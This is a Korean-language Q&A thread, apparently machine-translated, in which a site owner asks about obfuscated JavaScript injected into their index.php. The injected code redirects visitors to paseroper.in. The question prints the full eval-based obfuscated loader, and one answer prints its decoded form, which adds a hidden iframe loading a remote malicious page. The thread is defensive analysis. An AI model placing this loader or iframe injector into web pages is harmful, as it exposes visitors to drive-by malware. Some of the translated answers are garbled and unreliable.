이상한 자바 스크립트가 내 웹 페이지에 추가되었습니다. (http://paseroper.in으로 리다이렉트됩니다.)

Question

어쨌든 서버의 index.php 파일이 수정됩니다. 결과적으로 웹 페이지를 열면 다음 주소로 자동으로 리디렉션됩니다. redirected url
누군가 내 애플리케이션을 해킹 한 것으로 보입니다. 나는 index.php 파일은 다음과 같은 자바 스크립트에 함께 하였다 발견 :

<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script> 

사람이 위의 스크립트의 의미를 알고 있나요?
해당 스크립트를 제거하면 웹이 정상적으로 작동 할 수 있습니다. 이 공격을 방지하는 방법에 대한 권장 사항은 무엇입니까?

Answer 1

코드 모호함입니다. 아무도 당신에게 그 의미를 말할 것입니다 (Jon Skeet 제외).

난 당신이하지? :)이 eval는 거라고 얻는 코드입니다

Answer 2

, 당신은 페이지에서 해당 스크립트를 제거하고 당신이 버전 제어 시스템을 사용하고 (커밋 마지막으로 되돌아 제안

if (document.getElementsByTagName('body')[0]){ 
    iframer(); 
} else { 
    document.write("<iframe src='http://paseroper.in/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); 
} 
function iframer(){ 
    var f = document.createElement('iframe'); 
    f.setAttribute('src','http://paseroper.in/in.cgi?default'); 
    f.style.visibility='hidden'; 
    f.style.position='absolute'; 
    f.style.left='0'; 
    f.style.top='0'; 
    f.setAttribute('width','10'); 
    f.setAttribute('height','10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 

해당 URL로 이동하는 을 만듭니다.

코드를 방지하는 방법은 코드가 어떻게 들어가는지 알아야합니다. 스크립트 중 하나가 서버에서 임의의 코드를 실행할 수 있도록 허용했기 때문에 모든 PHP 플러그인과 사용자가 정보를 입력하고 올바르게 필터링하고 있는지 확인합니다.

또한 사용자에게 알려줄 수 있습니다. 모양에서 은 숨겨져 있으며 악성 코드 또는 스파이웨어의 드라이브 바이 설치를 시도하거나 수행하는 사이트 일 수 있음을 나타냅니다.